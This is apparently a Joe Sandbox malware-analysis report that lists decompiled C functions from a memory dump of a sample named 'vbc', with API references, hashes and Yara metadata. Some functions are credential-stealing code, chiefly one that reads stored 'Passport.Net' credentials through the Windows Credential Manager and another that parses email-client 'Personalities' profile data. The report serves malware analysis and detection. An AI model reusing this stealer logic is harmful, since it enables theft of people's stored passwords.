                                                                                                                                                                        • API ID: ??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                                        • Opcode ID: 9b5ba93a1d4d3230e71c89aa2b3a4c501730c6cf36628ebb8de87475de4246d9
                                                                                                                                                                        • Instruction ID: 21774ca54697e01c1adc3851c2de10052fd52e5bfec277bf8b6dbebc5e22beff
                                                                                                                                                                        • Opcode Fuzzy Hash: 9b5ba93a1d4d3230e71c89aa2b3a4c501730c6cf36628ebb8de87475de4246d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 55014872906D316BC5357A3559017DBA3947F05B19B06020FFA09B73424BAC7CE0C9DD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004016E5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                                        			E004016E5(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                                        0x004016f4
                                                                                                                                                                        0x0040170b
                                                                                                                                                                        0x00401715
                                                                                                                                                                        0x0040171d
                                                                                                                                                                        0x0040171e
                                                                                                                                                                        0x00401722
                                                                                                                                                                        0x00401727
                                                                                                                                                                        0x00401737
                                                                                                                                                                        0x0040174d

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 19018683-0
                                                                                                                                                                        • Opcode ID: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
                                                                                                                                                                        • Instruction ID: 87b9e555b8a68b0804226e1a7d1b9f87043edf3c617a3ea881a1d9d020f86292
                                                                                                                                                                        • Opcode Fuzzy Hash: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D01FB72900218BFDF04DFA8DC499FE7BBDFB45702F004469EE11AA194DAB1AA08CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411A0F Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E00411A0F(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v16;
				char _v24;
				char _v116;
				void _v1156;
				char _v1164;
				void _v1171;
				char _v1172;
				char _v2188;
				void _v2195;
				void _v2196;
				void _v3251;
				void _v3252;
				char _v4020;
				void* __edi;
				void* __esi;
				void* _t96;
				char _t105;
				intOrPtr _t112;
				void* _t115;
				signed int _t116;
				int _t121;
				signed int* _t122;
				void* _t124;
				void* _t125;
				signed int _t128;
				signed int* _t129;
				void* _t132;

				_t116 = __edx;
				_t105 = 0;
				_v2196 = 0;
				memset( &_v2195, 0, 0x3ff);
				_v3252 = 0;
				memset( &_v3251, 0, 0x41e);
				_v1172 = 0;
				memset( &_v1171, 0, 0x41e);
				_a8 = E00411533(_a8,  &_v2196);
				_t121 = strlen(_a4);
				if(_a8 > 8) {
					_t137 = _t121;
					if(_t121 > 0) {
						memcpy( &_v3252, _a4, _t121);
						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
						E0040BE2A( &_v116);
						_t19 = _t121 + 8; // 0x8
						E0040BE4E(_t19,  &_v116,  &_v3252);
						_t127 =  &_v116;
						E0040BEEC(_t121,  &_v116,  &_v1172);
						_t23 = _t121 + 8; // 0x8
						memcpy( &_v1156,  &_v3252, _t23);
						E0040BE2A( &_v116);
						_t27 = _t121 + 0x18; // 0x18
						E0040BE4E(_t27, _t127,  &_v1172);
						E0040BEEC(_t121, _t127,  &_v24);
						E00405364( &_v4020, _t137,  &_v1164,  &_v24);
						_t122 = _a12;
						E004053E0( &_v16,  &_v1172, _t122,  &_v4020);
						_t112 = _a8;
						_t128 = 0;
						if(_t112 >= 0x18) {
							_t37 = _t112 - 0x18; // -16
							asm("cdq");
							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
						}
						if(_t128 > _t105) {
							_a4 =  &_v2188;
							_t125 = _t122 + 8;
							_v8 = _t128;
							do {
								E004053E0(_a4, _t112, _t125,  &_v4020);
								_a4 = _a4 + 8;
								_t125 = _t125 + 8;
								_t45 =  &_v8;
								 *_t45 = _v8 - 1;
								_pop(_t112);
							} while ( *_t45 != 0);
							_t112 = _a8;
						}
						_t96 = 8 + _t128 * 8;
						_t50 = _t96 + 8; // 0x8
						if(_t50 > _t112) {
							_t51 = _t112 - 8; // 0x0
							_t96 = _t51;
						}
						if(_t96 > _t105) {
							_t129 = _a12;
							_t124 =  &_v2188 - _t129;
							_t115 = _t96;
							do {
								 *_t129 =  *_t129 ^  *(_t124 + _t129);
								_t129 =  &(_t129[0]);
								_t115 = _t115 - 1;
							} while (_t115 != 0);
						}
						 *((char*)(_t96 + _a12)) = _t105;
						 *_a16 = 1;
						_t105 = 1;
					}
				}
				return _t105;
			}































                                                                                                                                                                        0x00411a0f
                                                                                                                                                                        0x00411a1b
                                                                                                                                                                        0x00411a2a
                                                                                                                                                                        0x00411a30
                                                                                                                                                                        0x00411a43
                                                                                                                                                                        0x00411a49
                                                                                                                                                                        0x00411a57
                                                                                                                                                                        0x00411a5d
                                                                                                                                                                        0x00411a76
                                                                                                                                                                        0x00411a83
                                                                                                                                                                        0x00411a85
                                                                                                                                                                        0x00411a8b
                                                                                                                                                                        0x00411a8d
                                                                                                                                                                        0x00411a9e
                                                                                                                                                                        0x00411ab4
                                                                                                                                                                        0x00411abc
                                                                                                                                                                        0x00411ac8
                                                                                                                                                                        0x00411ace
                                                                                                                                                                        0x00411ada
                                                                                                                                                                        0x00411add
                                                                                                                                                                        0x00411ae2
                                                                                                                                                                        0x00411af4
                                                                                                                                                                        0x00411afb
                                                                                                                                                                        0x00411b07
                                                                                                                                                                        0x00411b0c
                                                                                                                                                                        0x00411b15
                                                                                                                                                                        0x00411b31
                                                                                                                                                                        0x00411b36
                                                                                                                                                                        0x00411b43
                                                                                                                                                                        0x00411b48
                                                                                                                                                                        0x00411b4e
                                                                                                                                                                        0x00411b53
                                                                                                                                                                        0x00411b55
                                                                                                                                                                        0x00411b58
                                                                                                                                                                        0x00411b63
                                                                                                                                                                        0x00411b63
                                                                                                                                                                        0x00411b66
                                                                                                                                                                        0x00411b6e
                                                                                                                                                                        0x00411b71
                                                                                                                                                                        0x00411b74
                                                                                                                                                                        0x00411b77
                                                                                                                                                                        0x00411b81
                                                                                                                                                                        0x00411b86
                                                                                                                                                                        0x00411b8a
                                                                                                                                                                        0x00411b8d
                                                                                                                                                                        0x00411b8d
                                                                                                                                                                        0x00411b90
                                                                                                                                                                        0x00411b90
                                                                                                                                                                        0x00411b93
                                                                                                                                                                        0x00411b93
                                                                                                                                                                        0x00411b96
                                                                                                                                                                        0x00411b9d
                                                                                                                                                                        0x00411ba2
                                                                                                                                                                        0x00411ba4
                                                                                                                                                                        0x00411ba4
                                                                                                                                                                        0x00411ba4
                                                                                                                                                                        0x00411ba9
                                                                                                                                                                        0x00411bab
                                                                                                                                                                        0x00411bb4
                                                                                                                                                                        0x00411bb6
                                                                                                                                                                        0x00411bb8
                                                                                                                                                                        0x00411bbb
                                                                                                                                                                        0x00411bbd
                                                                                                                                                                        0x00411bbe
                                                                                                                                                                        0x00411bbe
                                                                                                                                                                        0x00411bb8
                                                                                                                                                                        0x00411bc4
                                                                                                                                                                        0x00411bcd
                                                                                                                                                                        0x00411bcf
                                                                                                                                                                        0x00411bcf
                                                                                                                                                                        0x00411a8d
                                                                                                                                                                        0x00411bd7

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00411A30
                                                                                                                                                                        • memset.MSVCRT ref: 00411A49
                                                                                                                                                                        • memset.MSVCRT ref: 00411A5D
                                                                                                                                                                          • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                                                                                                                                                                        • strlen.MSVCRT ref: 00411A79
                                                                                                                                                                        • memcpy.MSVCRT ref: 00411A9E
                                                                                                                                                                        • memcpy.MSVCRT ref: 00411AB4
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                                                                                                                                                                          • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                                                                                                                                                                        • memcpy.MSVCRT ref: 00411AF4
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset$strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2142929671-0
                                                                                                                                                                        • Opcode ID: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                                                                                                                                                                        • Instruction ID: 6f2ed515a41b06c6c22f205846f23ff7f18478afa58802cd03ca93c0f6d1378b
                                                                                                                                                                        • Opcode Fuzzy Hash: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                                                                                                                                                                        • Instruction Fuzzy Hash: 29512B7290015DAACB14DF55CC81AEEB7A9FF04308F5441BAE609E7151EB34AA89CF98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407A69 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 36%
                                                                                                                                                                        			E00407A69(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x418540 == 0) {
					E004079E7();
				}
				_t40 =  *0x418538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x418530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x418534 + _t17 * 4)) +  *0x418528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4181b8 == 0) {
							_push( *0x418548 - 1);
							_push( *0x41852c);
							_push(_t39);
							_push(E00407BBF());
							goto L16;
						} else {
							strcpy(0x4182c0, "strings");
							_t31 = E00407EF3(_t39,  *0x41852c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x418548 - 1);
								_push( *0x41852c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41852c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x418548 - 1);
						_push( *0x41852c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x417b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x41344f;
					} else {
						_t23 =  *0x41853c;
						if(_t23 + _t56 + 2 >=  *0x418540 ||  *0x418538 >=  *0x418544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x418528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41852c, _t10);
							 *((intOrPtr*)( *0x418534 +  *0x418538 * 4)) =  *0x41853c;
							 *( *0x418530 +  *0x418538 * 4) = _t39;
							 *0x418538 =  *0x418538 + 1;
							 *0x41853c =  *0x41853c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}













                                                                                                                                                                        0x00407a69
                                                                                                                                                                        0x00407a70
                                                                                                                                                                        0x00407a72
                                                                                                                                                                        0x00407a72
                                                                                                                                                                        0x00407a77
                                                                                                                                                                        0x00407a7e
                                                                                                                                                                        0x00407a83
                                                                                                                                                                        0x00407a95
                                                                                                                                                                        0x00407a95
                                                                                                                                                                        0x00407a85
                                                                                                                                                                        0x00407a85
                                                                                                                                                                        0x00407a90
                                                                                                                                                                        0x00407a93
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407a93
                                                                                                                                                                        0x00407ac9
                                                                                                                                                                        0x00407ac9
                                                                                                                                                                        0x00407a97
                                                                                                                                                                        0x00407a99
                                                                                                                                                                        0x00407bba
                                                                                                                                                                        0x00407bba
                                                                                                                                                                        0x00407a9f
                                                                                                                                                                        0x00407aa5
                                                                                                                                                                        0x00407ad8
                                                                                                                                                                        0x00407b24
                                                                                                                                                                        0x00407b25
                                                                                                                                                                        0x00407b2b
                                                                                                                                                                        0x00407b31
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407ada
                                                                                                                                                                        0x00407ae4
                                                                                                                                                                        0x00407af0
                                                                                                                                                                        0x00407af5
                                                                                                                                                                        0x00407afa
                                                                                                                                                                        0x00407b0e
                                                                                                                                                                        0x00407b14
                                                                                                                                                                        0x00407b15
                                                                                                                                                                        0x00407b1b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407afc
                                                                                                                                                                        0x00407b07
                                                                                                                                                                        0x00407b0c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407b0c
                                                                                                                                                                        0x00407afa
                                                                                                                                                                        0x00407aa7
                                                                                                                                                                        0x00407aad
                                                                                                                                                                        0x00407aae
                                                                                                                                                                        0x00407ab7
                                                                                                                                                                        0x00407ab8
                                                                                                                                                                        0x00407ab8
                                                                                                                                                                        0x00407b32
                                                                                                                                                                        0x00407b38
                                                                                                                                                                        0x00407b3a
                                                                                                                                                                        0x00407b3a
                                                                                                                                                                        0x00407b3c
                                                                                                                                                                        0x00407bb3
                                                                                                                                                                        0x00407bb3
                                                                                                                                                                        0x00407b3e
                                                                                                                                                                        0x00407b3e
                                                                                                                                                                        0x00407b4d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407b5d
                                                                                                                                                                        0x00407b63
                                                                                                                                                                        0x00407b66
                                                                                                                                                                        0x00407b71
                                                                                                                                                                        0x00407b87
                                                                                                                                                                        0x00407b95
                                                                                                                                                                        0x00407ba0
                                                                                                                                                                        0x00407bac
                                                                                                                                                                        0x00407bb1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407bb1
                                                                                                                                                                        0x00407b4d
                                                                                                                                                                        0x00407b3c
                                                                                                                                                                        0x00407bbe

                                                                                                                                                                        APIs
                                                                                                                                                                        • strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,73B74DE0), ref: 00407AE4
                                                                                                                                                                          • Part of subcall function 00407EF3: _itoa.MSVCRT ref: 00407F14
                                                                                                                                                                        • strlen.MSVCRT ref: 00407B02
                                                                                                                                                                        • LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                        • memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                          • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A0F
                                                                                                                                                                          • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A2D
                                                                                                                                                                          • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A4B
                                                                                                                                                                          • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A5B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                                                                                                        • String ID: strings
                                                                                                                                                                        • API String ID: 1748916193-3030018805
                                                                                                                                                                        • Opcode ID: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                                                                                                                                                                        • Instruction ID: 4e35bd01ad2207757dd6e5c19dba2cefa7e6d732e740aa6e4bc5455c9760af59
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                                                                                                                                                                        • Instruction Fuzzy Hash: BA315771A08101AFD7159B58ED80DA63777E744348750807EEC01A72A2DF39BD81CF5E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040DC39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                        			E0040DC39(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046E1( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404651( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047AA( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x418768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x418768;
							if(E0040481B( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046CC( &_v60);
				E004047FB( &_v584);
				return _t69;
			}























                                                                                                                                                                        0x0040dc39
                                                                                                                                                                        0x0040dc4a
                                                                                                                                                                        0x0040dc4c
                                                                                                                                                                        0x0040dc54
                                                                                                                                                                        0x0040dc57
                                                                                                                                                                        0x0040dc5a
                                                                                                                                                                        0x0040dc5f
                                                                                                                                                                        0x0040dc61
                                                                                                                                                                        0x0040dc77
                                                                                                                                                                        0x0040dc78
                                                                                                                                                                        0x0040dc79
                                                                                                                                                                        0x0040dc7b
                                                                                                                                                                        0x0040dc85
                                                                                                                                                                        0x0040dc8b
                                                                                                                                                                        0x0040dc91
                                                                                                                                                                        0x0040dca3
                                                                                                                                                                        0x0040dcab
                                                                                                                                                                        0x0040dcae
                                                                                                                                                                        0x0040dcb0
                                                                                                                                                                        0x0040dcb1
                                                                                                                                                                        0x0040dcb1
                                                                                                                                                                        0x0040dcbc
                                                                                                                                                                        0x0040dcc4
                                                                                                                                                                        0x0040dcc5
                                                                                                                                                                        0x0040dcdb
                                                                                                                                                                        0x0040dcde
                                                                                                                                                                        0x0040dcec
                                                                                                                                                                        0x0040dd0d
                                                                                                                                                                        0x0040dd26
                                                                                                                                                                        0x0040dd2f
                                                                                                                                                                        0x0040dd2f
                                                                                                                                                                        0x0040dd33
                                                                                                                                                                        0x0040dd33
                                                                                                                                                                        0x0040dd39
                                                                                                                                                                        0x0040dd39
                                                                                                                                                                        0x0040dd3d
                                                                                                                                                                        0x0040dd3d
                                                                                                                                                                        0x0040dc85
                                                                                                                                                                        0x0040dd43
                                                                                                                                                                        0x0040dd4e
                                                                                                                                                                        0x0040dd58

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                          • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,73AFF420), ref: 0040465E
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                                                                                                                                                                          • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
                                                                                                                                                                          • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                                                                                                                                                                        • strlen.MSVCRT ref: 0040DD15
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 0040DD26
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040DD33
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                        • String ID: Passport.Net\*
                                                                                                                                                                        • API String ID: 3335197805-3671122194
                                                                                                                                                                        • Opcode ID: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
                                                                                                                                                                        • Instruction ID: efac9c12738a0d8289842d1efaad299d98c72222a78c1cf1bd4cf7de0e5ce36b
                                                                                                                                                                        • Opcode Fuzzy Hash: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
                                                                                                                                                                        • Instruction Fuzzy Hash: 47313AB6E00109ABDB10EF96DD45DEE7BB8EF85304F10007AE605F7291D7389A45CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403278 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00403278(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E00402197( &_v1968);
					if(E00403127(_t52, _t49, 0) != 0) {
						E004023C6(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
						_v14 = 0;
						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E00402197( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E00403127(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E004023C6(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}



















                                                                                                                                                                        0x00403278
                                                                                                                                                                        0x00403286
                                                                                                                                                                        0x00403290
                                                                                                                                                                        0x00403297
                                                                                                                                                                        0x0040329d
                                                                                                                                                                        0x004032ad
                                                                                                                                                                        0x004032b4
                                                                                                                                                                        0x004032b4
                                                                                                                                                                        0x004032c6
                                                                                                                                                                        0x004032cc
                                                                                                                                                                        0x004032e6
                                                                                                                                                                        0x004032ee
                                                                                                                                                                        0x0040336a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004032f0
                                                                                                                                                                        0x004032f0
                                                                                                                                                                        0x004032f3
                                                                                                                                                                        0x004032f6
                                                                                                                                                                        0x004032f9
                                                                                                                                                                        0x004032fc
                                                                                                                                                                        0x004032fe
                                                                                                                                                                        0x0040335c
                                                                                                                                                                        0x0040335d
                                                                                                                                                                        0x00403364
                                                                                                                                                                        0x00403368
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403306
                                                                                                                                                                        0x0040330c
                                                                                                                                                                        0x00403324
                                                                                                                                                                        0x00403341
                                                                                                                                                                        0x00403341
                                                                                                                                                                        0x00403346
                                                                                                                                                                        0x00403349
                                                                                                                                                                        0x00403353
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403355
                                                                                                                                                                        0x00403355
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403355
                                                                                                                                                                        0x00403353
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040335c
                                                                                                                                                                        0x004032ee
                                                                                                                                                                        0x0040336e

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00403127: strchr.MSVCRT ref: 0040323C
                                                                                                                                                                        • memset.MSVCRT ref: 004032CC
                                                                                                                                                                        • GetPrivateProfileSectionA.KERNEL32 ref: 004032E6
                                                                                                                                                                        • strchr.MSVCRT ref: 0040331B
                                                                                                                                                                          • Part of subcall function 004023C6: _mbsicmp.MSVCRT ref: 004023FE
                                                                                                                                                                        • strlen.MSVCRT ref: 0040335D
                                                                                                                                                                          • Part of subcall function 004023C6: _mbscmp.MSVCRT ref: 004023DA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                        • String ID: Personalities
                                                                                                                                                                        • API String ID: 2103853322-4287407858
